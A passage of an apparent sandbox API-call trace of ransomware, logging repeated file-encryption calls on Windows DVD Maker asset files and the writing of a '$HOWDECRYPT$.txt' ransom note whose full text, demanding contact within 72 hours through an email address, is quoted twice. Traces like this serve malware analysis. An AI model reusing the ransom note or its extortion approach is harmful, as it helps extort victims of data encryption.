dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.969] GetProcessHeap () returned 0x2c0000 [0092.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.969] GetProcessHeap () returned 0x2c0000 [0092.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0092.970] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd50 | out: pbBuffer=0x57fd50) returned 1 [0092.970] GetProcessHeap () returned 0x2c0000 [0092.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd48*=0x30) returned 1 [0092.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.970] GetProcessHeap () returned 0x2c0000 [0092.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.971] GetProcessHeap () returned 0x2c0000 [0092.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0092.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd48 | out: pbBuffer=0x57fd48) returned 1 [0092.971] GetProcessHeap () returned 0x2c0000 [0092.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.971] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd40*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd40*=0x30) returned 1 [0092.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.971] GetProcessHeap () returned 0x2c0000 [0092.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.971] GetProcessHeap () returned 0x2c0000 [0092.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ef68 | out: hHeap=0x2c0000) returned 1 [0092.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd48 | out: pbBuffer=0x57fd48) returned 1 [0092.971] GetProcessHeap () returned 0x2c0000 [0092.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.972] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd40*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd40*=0x30) returned 1 [0092.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.972] GetProcessHeap () returned 0x2c0000 [0092.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.973] GetProcessHeap () returned 0x2c0000 [0092.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0092.973] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd40 | out: pbBuffer=0x57fd40) returned 1 [0092.973] GetProcessHeap () returned 0x2c0000 [0092.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd38*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd38*=0x30) returned 1 [0092.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.973] GetProcessHeap () returned 0x2c0000 [0092.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.973] GetProcessHeap () returned 0x2c0000 [0092.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.975] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.975] WriteFile (in: hFile=0x178, lpBuffer=0x57fc73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fd9c, lpOverlapped=0x0 | out: lpBuffer=0x57fc73*, lpNumberOfBytesWritten=0x57fd9c*=0x127, lpOverlapped=0x0) returned 1 [0092.976] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.976] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fd9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fd9c*=0x2ac, lpOverlapped=0x0) returned 1 [0092.976] CloseHandle (hObject=0x178) returned 1 [0092.976] GetProcessHeap () returned 0x2c0000 [0092.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0092.976] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd38 | out: pbBuffer=0x57fd38) returned 1 [0092.976] GetProcessHeap () returned 0x2c0000 [0092.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.976] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd30*=0x30) returned 1 [0092.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.977] GetProcessHeap () returned 0x2c0000 [0092.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.977] GetProcessHeap () returned 0x2c0000 [0092.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e128 | out: hHeap=0x2c0000) returned 1 [0092.978] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd38 | out: pbBuffer=0x57fd38) returned 1 [0092.978] GetProcessHeap () returned 0x2c0000 [0092.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.978] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd30*=0x30) returned 1 [0092.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.978] GetProcessHeap () returned 0x2c0000 [0092.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.978] GetProcessHeap () returned 0x2c0000 [0092.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e488 | out: hHeap=0x2c0000) returned 1 [0092.978] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd30 | out: pbBuffer=0x57fd30) returned 1 [0092.978] GetProcessHeap () returned 0x2c0000 [0092.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.978] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd28*=0x30) returned 1 [0092.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.978] GetProcessHeap () returned 0x2c0000 [0092.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.978] GetProcessHeap () returned 0x2c0000 [0092.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381a90 | out: hHeap=0x2c0000) returned 1 [0092.979] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd30 | out: pbBuffer=0x57fd30) returned 1 [0092.979] GetProcessHeap () returned 0x2c0000 [0092.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd28*=0x30) returned 1 [0092.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.979] GetProcessHeap () returned 0x2c0000 [0092.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.979] GetProcessHeap () returned 0x2c0000 [0092.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a460 | out: hHeap=0x2c0000) returned 1 [0092.979] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd28 | out: pbBuffer=0x57fd28) returned 1 [0092.979] GetProcessHeap () returned 0x2c0000 [0092.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd20*=0x30) returned 1 [0092.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.980] GetProcessHeap () returned 0x2c0000 [0092.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.980] GetProcessHeap () returned 0x2c0000 [0092.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375928 | out: hHeap=0x2c0000) returned 1 [0092.980] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd28 | out: pbBuffer=0x57fd28) returned 1 [0092.980] GetProcessHeap () returned 0x2c0000 [0092.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.980] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd20*=0x30) returned 1 [0092.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.980] GetProcessHeap () returned 0x2c0000 [0092.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.980] GetProcessHeap () returned 0x2c0000 [0092.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381988 | out: hHeap=0x2c0000) returned 1 [0092.980] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd20 | out: pbBuffer=0x57fd20) returned 1 [0092.980] GetProcessHeap () returned 0x2c0000 [0092.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.980] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd18*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd18*=0x30) returned 1 [0092.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.981] GetProcessHeap () returned 0x2c0000 [0092.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.981] GetProcessHeap () returned 0x2c0000 [0092.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a750 | out: hHeap=0x2c0000) returned 1 [0092.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd20 | out: pbBuffer=0x57fd20) returned 1 [0092.981] GetProcessHeap () returned 0x2c0000 [0092.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd18*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd18*=0x30) returned 1 [0092.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.982] GetProcessHeap () returned 0x2c0000 [0092.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.982] GetProcessHeap () returned 0x2c0000 [0092.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a360 | out: hHeap=0x2c0000) returned 1 [0092.982] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd18 | out: pbBuffer=0x57fd18) returned 1 [0092.982] GetProcessHeap () returned 0x2c0000 [0092.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.982] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd10*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd10*=0x30) returned 1 [0092.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.982] GetProcessHeap () returned 0x2c0000 [0092.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.982] GetProcessHeap () returned 0x2c0000 [0092.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0092.982] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd18 | out: pbBuffer=0x57fd18) returned 1 [0092.982] GetProcessHeap () returned 0x2c0000 [0092.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.983] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd10*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd10*=0x30) returned 1 [0092.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.983] GetProcessHeap () returned 0x2c0000 [0092.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.983] GetProcessHeap () returned 0x2c0000 [0092.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e710 | out: hHeap=0x2c0000) returned 1 [0092.983] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd10 | out: pbBuffer=0x57fd10) returned 1 [0092.983] GetProcessHeap () returned 0x2c0000 [0092.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.983] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd08*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd08*=0x30) returned 1 [0092.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.983] GetProcessHeap () returned 0x2c0000 [0092.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.983] GetProcessHeap () returned 0x2c0000 [0092.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0092.984] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd10 | out: pbBuffer=0x57fd10) returned 1 [0092.984] GetProcessHeap () returned 0x2c0000 [0092.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.984] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd08*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd08*=0x30) returned 1 [0092.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.984] GetProcessHeap () returned 0x2c0000 [0092.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.984] GetProcessHeap () returned 0x2c0000 [0092.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.985] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.985] WriteFile (in: hFile=0x178, lpBuffer=0x57fc3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fd68, lpOverlapped=0x0 | out: lpBuffer=0x57fc3f*, lpNumberOfBytesWritten=0x57fd68*=0x127, lpOverlapped=0x0) returned 1 [0092.986] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.986] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fd68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fd68*=0x2ac, lpOverlapped=0x0) returned 1 [0092.986] CloseHandle (hObject=0x178) returned 1 [0092.987] GetProcessHeap () returned 0x2c0000 [0092.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e638 | out: hHeap=0x2c0000) returned 1 [0092.987] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd08 | out: pbBuffer=0x57fd08) returned 1 [0092.987] GetProcessHeap () returned 0x2c0000 [0092.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.987] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd00*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd00*=0x30) returned 1 [0092.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_title.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.989] GetProcessHeap () returned 0x2c0000 [0092.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.989] GetProcessHeap () returned 0x2c0000 [0092.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) 